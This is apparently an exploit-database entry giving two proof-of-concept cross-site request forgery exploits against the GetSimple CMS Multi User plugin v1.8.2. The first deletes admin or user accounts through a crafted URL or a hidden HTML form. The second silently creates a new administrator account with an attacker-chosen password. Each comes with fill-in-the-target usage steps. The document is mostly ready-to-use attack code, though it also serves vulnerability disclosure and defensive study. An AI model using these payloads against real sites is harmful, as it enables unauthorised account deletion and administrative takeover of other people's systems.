GetSimple CMS Multi User plugin version 1.8.2 suffers from multiple cross site request forgery vulnerabilities.
b7868197fa770b7cffbd822964b7f528# Exploit Title: GetSimple CMS Plugin Multi User v1.8.2 - Cross-Site Request Forgery (Delete Admin/User)
# Exploit Author: Bobby Cooke (boku) & Adeeb Shah (@hyd3sec)
# Date: August 12, 2020
# Vendor Homepage: http://get-simple.info/extend/plugin/multi-user/133/
# Software Link: http://get-simple.info/extend/export/960/133/multi-user.zip
# Version: 1.8.2
# Tested On: Windows 10 Pro + XAMPP
# CWE-352: Cross-Site Request Forgery (CSRF)
# Vulnerability Description:
# Cross-Site Request Forgery (CSRF) vulnerability in Multi User v1.8.2 plugin for GetSimple CMS allows remote attackers to delete admin/user users via authenticated admin visiting a third-party site or clicking a URL.
## Usage:
+ Change <IP||DOMAIN> to target IP address or domain name
+ Change <ADMIN/USER_NAME> to target username to delete
## CSRF GET URL Method
<IP||DOMAIN>/admin/load.php?id=user-managment&deletefile=<ADMIN/USER_NAME>
## CSRF POST Form Method
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://<IP||DOMAIN>/admin/load.php">
<input type="hidden" name="id" value="user-managment" />
<input type="hidden" name="deletefile" value="<ADMIN/USER_NAME>" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
# Exploit Title: GetSimple CMS Plugin Multi User v1.8.2 - Cross-Site Request Forgery (Add Admin)
# Exploit Author: Bobby Cooke (boku) & Adeeb Shah (@hyd3sec)
# Date: August 12, 2020
# Vendor Homepage: http://get-simple.info/extend/plugin/multi-user/133/
# Software Link: http://get-simple.info/extend/export/960/133/multi-user.zip
# Version: 1.8.2
# Tested On: Windows 10 Pro + XAMPP
# CWE-352: Cross-Site Request Forgery (CSRF)
# Vulnerability Description:
# Cross-Site Request Forgery (CSRF) vulnerability in Multi User v1.8.2 plugin for GetSimple CMS allows remote attackers to add an Admin user via authenticated admin visiting a third-party site.
## Usage:
+ Change <IP||DOMAIN> to target IP address or domain name
+ Change <ADMIN> to target username
+ Change <PASSWORD> to target password
## CSRF POST Form Method
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://<IP||DOMAIN>/admin/load.php?id=user-managment" method="POST">
<input type="hidden" name="usernamec" value="<ADMIN>" />
<input type="hidden" name="useremail" value="[email protected]" />
<input type="hidden" name="ntimezone" value="" />
<input type="hidden" name="userlng" value="en_US" />
<input type="hidden" name="userpassword" value="<PASSWORD>" />
<input type="hidden" name="usereditor" value="1" />
<input type="hidden" name="Landing" value="" />
<input type="hidden" name="add-user" value="Add New User" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>